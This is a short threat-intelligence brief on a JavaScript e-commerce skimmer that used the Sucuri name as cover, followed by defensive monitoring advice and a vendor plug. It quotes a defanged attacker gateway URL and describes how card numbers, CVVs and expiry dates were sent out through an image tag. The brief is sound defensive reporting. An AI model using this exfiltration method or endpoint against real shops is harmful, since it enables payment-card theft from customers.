Threat Watch

Sucuri Name Being Used by E-Skimmer to Avoid Detection

Cybersecurity company Sucuri recently revealed that they discovered an e-skimmer taking advantage of their name in order to go unnoticed. The attackers inject the base64-encoded JavaScript skimmer into targeted sites. Once the skimmer has a foothold on the site it will be used to gather personal information from form fields, which will then be sent to a remote gateway. “The payment data exfiltration takes place via an <img> tag whose src parameter is changed to hxxps://terminal4.veeblehosting[.]com/~sucurrin/i/gate.php, with relevant GET parameters such as card number, CVV, and expiration date stored in plain text,” reads a portion of Sucuri’s analysis. The “terminal4.veeblehosting[.]com/~sucurrin/” domain even redirects to the real Sucuri webpage in an effort to further avoid detection. It is believed that the skimmer in question was also used in an attempt to exfiltrate data on the websites for Harley-Davidson Military, Nappy Land National Childcare Supplier, and Soccer4All.

ANALYST NOTES

E-skimmers can be difficult to protect against, but companies should regularly monitor their servers from the perspective of web clients in an effort to detect suspicious communication between client web browsers and malicious or unexpected servers via JavaScript. Companies that operate e-commerce websites can also monitor file integrity changes and look for anomalies such as new references to JavaScript functions. As this incident shows, it is important to carefully examine the contents of JavaScript code and not just rely on the name of the script file to indicate that it is safe or expected. A Security Operations Center (SOC) should monitor critical web servers used for e-commerce to detect any abnormal patterns of remote access or evidence of backdoor implants that could indicate an attacker has accessed the system. The Binary Defense Security Operations Task Force operates 24/7 to monitor security events on servers and workstations. Another method of protection would be to employ a trusted security provider that tests for system vulnerabilities and can give guidance on how to better secure the website. Such security assessments are provided by TrustedSec.

Source: https://securityaffairs.co/wordpress/111009/cyber-crime/sucuri-software-skimmer.html